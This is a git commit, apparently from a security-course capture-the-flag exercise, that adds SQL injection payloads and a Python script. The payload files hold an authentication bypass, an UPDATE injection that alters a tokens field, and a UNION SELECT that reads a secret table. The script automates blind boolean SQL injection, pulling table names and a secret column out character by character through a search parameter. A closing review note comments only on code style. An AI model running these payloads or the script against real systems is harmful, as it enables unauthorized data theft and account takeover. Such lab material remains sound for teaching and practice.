This commit is contained in:
2025-12-11 21:33:56 +00:00
parent f378edec75
commit 6ff3273351
4 changed files with 79 additions and 0 deletions


@@ -0,0 +1,3 @@
SELECT id, username, password, bio, age, jackpot_val FROM user WHERE username = '' AND password = '<pass>'
admin' OR username = '


@@ -0,0 +1,3 @@
UPDATE user SET bio = ''' WHERE username = 'didas'
', tokens = '65666


@@ -0,0 +1,70 @@
from requests import get
from urllib.parse import quote
import re
BASE = "http://ssof2526.challenges.cwte.me:25262"
PL_HEAD = "' AND id = 0 UNION "
PL_TAIL = "--"
def get_arts(payload: str) -> int:
final_payload = PL_HEAD + payload + PL_TAIL
resp = get(BASE+"/?search="+quote(final_payload))
content = resp.content.decode('utf-8')
result = re.search(r"Found ([0-9]+) article", content)
if result is None:
print("Payload malformed:")
print(payload)
print(content)
exit(1)
return int(result.group(1))
def stringer(column: str, table: str, where: str = "1 = 1", max: int = 50) -> list[str]:
lengths = []
strings = []
for length in range(max):
length += 1
payload = "SELECT %s, %s, %s FROM %s WHERE LENGTH(%s) = %d AND %s;"%(column, column, column, table, column, length, where)
arts = get_arts(payload)
if arts != 0:
lengths.append(length)
print("Length %d has %s"%(length, arts))
for length in lengths:
print("Searching for len", length, " ", end="", flush=True)
name = ""
for _ in range(length):
print(".", end="", flush=True)
for l in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_()[]+-*/;:,. !\"&|{}~^`=":
cur_name = name + (l if l != '_' else "\\_")
payload = "SELECT %s, %s, %s FROM %s WHERE LENGTH(%s) = %d AND '%s' = substr((%s), %d, 1) AND %s;"%(column, column, column, table, column, length, l, column, len(cur_name)-1, where)
if (get_arts(payload) != 0):
name = cur_name
break
if name == cur_name[:-1]:
name = name + '_'
strings.append(name)
print(" found", name)
return strings
#print(stringer("name", "sqlite_master"))
#print(stringer("sql", "sqlite_master", "name == 'super_s_sof_secrets'", 100))
print(stringer("secret", "super_s_sof_secrets", max=120))
# SELECT id, title, content FROM blog_post WHERE title LIKE '<input>
#' AND id = 0 UNION SELECT id, title, content FROM blog_post WHERE title LIKE 'flag'; --
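Review bot: The `exit(1)` in get_arts (inside the `if result is None:` branch) uses the interactive helper installed by the `site` module rather than a language builtin, so it is undefined under `python -S` or in a frozen build; the handler should call `sys.exit(1)` and the import block should gain `import sys`. The `max` parameter of stringer shadows the builtin of the same name, which misleads a reader even though the body never calls the builtin; a name like `max_len` would be clearer, but renaming it means also updating the keyword call `max=120` at the end of the file. That final `print(stringer("secret", "super_s_sof_secrets", max=120))` runs at import time and belongs under `if __name__ == "__main__":`. Neither function has a docstring; a one-line summary on each, stating what the function returns and that get_arts terminates the process when the `Found N article` marker is absent, would help the next reader.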


@@ -0,0 +1,3 @@
SELECT id, title, content FROM blog_post WHERE title LIKE '%a'%' OR content LIKE '%a'%'
' UNION SELECT id, title, content FROM secret_blog_post ;--